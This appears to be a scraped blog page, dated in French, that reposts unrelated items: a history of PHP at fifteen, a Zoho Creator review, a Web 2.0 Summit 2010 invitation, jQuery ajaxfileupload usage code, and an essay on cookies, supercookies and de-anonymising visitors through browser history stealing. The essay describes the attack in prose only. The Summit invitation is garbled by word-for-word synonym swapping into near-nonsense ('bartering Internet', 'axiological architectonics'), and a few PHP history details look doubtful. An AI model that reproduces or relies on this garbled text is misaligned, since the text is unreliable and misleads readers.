read more...
vendredi 8 avril 2011
mercredi 9 juin 2010
PHP is Fifteen Today!

PHP was released by Rasmus Lerdorf on June 8, 1995. His original usenet post is still available online if you want to examine a computing artefact from the dawn of the web. Many of us owe our careers to the language, so here’s a brief history of PHP…
PHP originally stood for “Personal Home Page” and Rasmus started the project in 1994. PHP was written in C and was intended to replace several Perl scripts he was using on his homepage. Few people will be ancient enough to remember CGI programming in Perl, but it wasn’t much fun. You could not embed code within HTML and development was slow and clunky.
Ramsmus added his own Form Interpreter and other C libraries including database connectivity engines. PHP 2.0 was born on this day 15 years ago. PHP had a modest following until the launch of version 3.0 in June 1998. The parser was completely re-written by Andi Gutmans and Zeev Suraski; they also changed the name to the recursive “PHP: Hypertext Preprocessor”.
Critics argue that PHP 3.0 was insecure, had a messy syntax, and didn’t offer standard coding conventions such as object-orientated programming. Some will quote the same arguments today. However, while PHP lacked elegance it made web development significantly easier. Programming novices could add snippets of code to their HTML pages and experts could develop full web applications using an open source technology which became widely installed by web hosts.
PHP 4.0 was released on May 22, 2000. It provided rudimentary object-orientation and addressed several security issues such as disabling register_globals. Scripts broke, but it was relatively easy to adapt applications for the new platform. PHP 4.0 was an instant success and you’ll still find it offered by web hosts today. Popular systems such as WordPress and Drupal still run on PHP 4.0 even though platform development has ceased.
Finally, we come to PHP 5.0 which was released on July 13, 2004. The language featured more robust object-orientated programming plus security and performance enhancements. The uptake has been more sedate owing to the success of PHP 4.0 and the introduction of competing frameworks such as ASP.NET, Ruby and Python.
PHP has its inconsistencies and syntactical messiness, but it’s rare you’ll encounter a language which can be installed on almost any OS, is provided by the majority of web hosts, and offers a similar level of productivity and community assistance. Whatever your opinion of the language, PHP has provided a solid foundation for server-side programming and web application development for the past 15 years. Long may it continue.
mardi 8 juin 2010
Build your own web2.0 apps
Zoho Creator by AdventNet is a webbased interface that allows you to CREATE programs. The whole thing has a rich AJAX built interface that has a familiar look and feel for users known to AJAX apps in general and other zoho releases specifically, such as the zoho planner (reviewed by me before). Creation of an application such as a form is easy. The editor does everything for you - you just provide the content. As soon as the application is built you can easily create one or more views where you can see the results, sorted as you like and there's also room for reporting. The app looks great for creating datacollection applications such as crm apps and helpdesk (ticketing) systems. The best thing is to obtain a link to the application you built to embed it in your website. A nice feature fro spreadsheet-tigers : You can import them to create applications.
Web 2.0 Summit 2010
The Web 2.0 Summit is the alone place, already a year, area leaders of the Internet Economy accumulate to agitation and actuate business strategy. Join the administration of this amazing industry this November 15-17 in San Francisco.
Fifteen years and two recessions into the bartering Internet, it's bright that our industry has confused into a aggressive phase—a "middlegame" in the action to boss the Internet Economy.
At this year's Web 2.0 Summit, we're absorption on these alive credibility of control—strategic chokepoints on an more awash board. The decisions we accomplish as an industry will actuate the axiological architectonics of our society.
We'll use the Summit's affairs to affection companies who are alteration action and affective into fresh fields of battle. We'll map cardinal articulation credibility and analyze key players who are aggressive to ascendancy the casework and basement of a websquared world, including:
Mobile and sensor platforms
Distribution
Social graph
Identity casework and acquittal systems
Location services
Data transport
and Advertising
Web 2.0 Summit gathers the intelligence, innovation, and administration of the Internet and media industries for a chat that never fails to stimulate, push, and surprise. Alone at Web 2.0 Summit will you acquisition in one place:
A chat with – and fresh artefact advertisement from – the CEO of GE
A abruptness appointment from Google architect Sergey Brin
Real-time chase announcements from Google, Microsoft, Facebook, and Twitter
Insights from Carly Fiorina, boxlike CEO Denis Crowley, Newscorp Digital CEO Jon Miller, Adobe CEO Shantanu Narayen, Intel CEO Paul Otellini, and dozens more
First anytime insights on Comcast’s fresh web-based belvedere from CEO Brian Roberts
And the reflections and musings of the Web’s patriarch, Sir Tim Berners-Lee
Be abiding to mark your calendars for the seventh anniversary Web 2.0 Summit‚ accident November 15-17, 2010. We’re active alive on this year’s apostle calendar (we already accept a few suprises for you), but accomplish abiding to assurance up afore all seats are sold—as they accept been for the accomplished bristles years.
Web 2.0 Summit will acknowledgment to the Palace Hotel in San Francisco this year. Space is bound and appearance is by allurement only, so abide your appeal for an allurement today.
Our Best,
John Battelle and Tim O'Reilly
lundi 7 juin 2010
ajaxfileupload
that simplifies how you traverse HTML documents, handle events, perform animations, and add Ajax interactions to your web pages.
This AjaxFileUpload Plugin is a hacked version of Ajaxupload plugin created by yvind Saltvik, which is really good enought for normal use. Its idea is to create a iframe and submit the specified form to it for further processing.
In this hacked version, it submits the specified file type of input element only rather than an entire form
How to use it?
1. include jquery.js & ajaxfileupload.js javascript files
2. create a function to be fired when the upload button clicked.
e.g.
function ajaxFileUpload()
{
//starting setting some animation when the ajax starts and completes
$("#loading")
.ajaxStart(function(){
$(this).show();
})
.ajaxComplete(function(){
$(this).hide();
});
/*
prepareing ajax file upload
url: the url of script file handling the uploaded files
fileElementId: the file type of input element id and it will be the index of $_FILES Array()
dataType: it support json, xml
secureuri:use secure protocol
success: call back function when the ajax complete
error: callback function when the ajax failed
*/
$.ajaxFileUpload
(
{
url:'doajaxfileupload.php',
secureuri:false,
fileElementId:'fileToUpload',
dataType: 'json',
success: function (data, status)
{
if(typeof(data.error) != 'undefined')
{
if(data.error != '')
{
alert(data.error);
}else
{
alert(data.msg);
}
}
},
error: function (data, status, e)
{
alert(e);
}
}
)
return false;
}
Cookies, Supercookies and Ubercookies: Stealing the Identity of Web Visitors
Cookies. Most people are aware that their web browsing activity over time and across sites can be tracked using cookies. When you are being tracked, it can be deduced that the same person visited certain sites at certain times, but the sites doing the tracking don’t know who you are, i.e., you name, etc., unless you choose to tell them in some way, such as by logging in.
Cookies are easy to delete, and so there’s been a big impetus in the Internet advertising industry to discover and deploy more robust tracking mechanisms.
Supercookies. You may surprised to find just how helpless a user is against a site (or more usually, a network of sites) that is truly determined to track them. There are Flash cookies, much harder to delete, some of which respawn the regular HTTP cookies that you delete. The EFF’s Panopticlick project demonstrates many “browser fingerprinting” methods which are more sophisticated. (Jonathan Mayer’s senior thesis contained a smaller-scale demonstration of some of those techniques).
A major underlying reason for a lot of these problems is that any browser feature that allows a website to store “state” on the client can be abused for tracking, and there are a bewildering variety of these. There is a great analysis in a paper by my Stanford colleagues. One of the points they make is that co-operative tracking by websites is essentially impossible to defend against.
Ubercookies: history stealing. Now let’s get to the scary stuff: uncovering identity. History stealing or history sniffing is an unintended consequence of the way the web is designed; it allows a website to learn which URLs you’ve been to. While a site can’t simply ask your browser for a list of visited URLs, it can ask “yes/no” questions and your browser will faithfully respond. The most common way of doing this is by injecting invisible links into the page using Javascript and exploiting the fact that the CSS link color attribute depends on whether the link has been visited or not.
History stealing has been known for a decade, and browser vendors have failed to fix it because it cannot be fixed without sacrificing some useful functionality (the crude way is to turn off visited link coloring altogether; a subtler solution is SafeHistory). Increasingly worse consequences have been discovered over the years: for example, a malicious site can learn which bank you use and customize a phishing page accordingly. But a paper (full text, PDF) coming out at this year’s IEEE S&P conference at Oakland takes it to a new level.
Identity. Let’s pause for a second and think about what finding your identity means. In the modern, social web, social network accounts have become our de-facto online identities, and most people reveal their name and at least some other real-world information about ourselves on our profiles. So if the attacker can discover the URL of your social network profile, we can agree that he has identified you for all practical purposes. And the new paper shows how to do just that.
The attack relies on the following observations:
Almost all social networking sites have some kind of “group” functionality: users can add themselves to groups.
Users typically add themselves to multiple groups, at least some of which are public.
Group affiliations, just like your movie-watching history and many other types of attributes, are sufficient to fingerprint a user. There’s a high chance there’s no one else who belongs to the same set of groups that you do (or is even close). [Aside: I used this fact to show that Lending Club data can be de-anonymized.]
Users who belong to a group are likely to visit group-specific URLs that are predictable.
Put the above facts together, and the attack emerges: the attacker (an arbitrary website you visit, without the co-operation of whichever social network is used as an attack enabler) uses history stealing to test a bunch of group-related URLs one by one until he finds a few (public) groups that the anonymous user probably belongs to. The attacker has already crawled the social network, and therefore knows which user belongs to which groups. Now he puts two and two together: using the list of groups he got from the browser, he does a search on the backend to find the (usually unique) user who belongs to all those groups.
Needless to say, this is a somewhat simplified description. The algorithm can be easily modified so that it will work even if some of the groups have disappeared from your history (say because you clear it once in a while) or if you’ve visited groups you’re not a member of. The authors demonstrated that the attack with real users on the Xing network, and also showed theoretically that it is feasible on a number of other social networks including Facebook and Myspace. It takes a few thousand Javascript queries and runs in a few seconds on modern browsers, which makes it pretty much surreptitious.
Fallout. There are only two ways to try to fix this. The first is for all the social networking sites to change their URL patterns by randomizing them so that point 4 above (predictable URL identifying that you belong to a group) is no longer true. The second is for all the browser vendors to fix their browsers so that history stealing is no longer possible.
The authors contacted several of the social networks; Xing quickly implemented the URL randomization fix, which I find surprising and impressive. Ultimately, however, Xing’s move will probably be no more than a nice gesture, for the following reason.
Over the last few days, I have been working on a stronger version of this attack which:
can make use of every URL in the browser history to try and identify the user. This means that server-side fixes are not possible, because literally every site on the web would need to implement randomization.
avoids the costly crawling step, further lowering the bar to executing the attack.
That leaves browser-based fixes for history stealing, which hasn’t happened in the 10 years that the problem has been known. Will browsers vendors finally accept the functionality hit and deal with the problem? We can hope so, but it remains to be seen.
In the next article, I will describe the stronger attack and also explain in more detail why your profile page on almost any website is a very strong identifier.
Thanks to Adam Bossy for reviewing a draft.
AddThis Makes Sharing Easy for Blogs, Websites and Flash
Largest collection of services, and growing.
Your content can now be shared to more services than ever before. Popular sites like Facebook, Twitter, and Digg... Sites popular in other countries like Meneame, Hatena, and NUjij... and even new utilities like Instapaper, Google Translate, and PDFthis. The best part is, the AddThis Service Directory is growing and automatically helps to keep your sharing tools up-to-date with these new services, so you don't have to.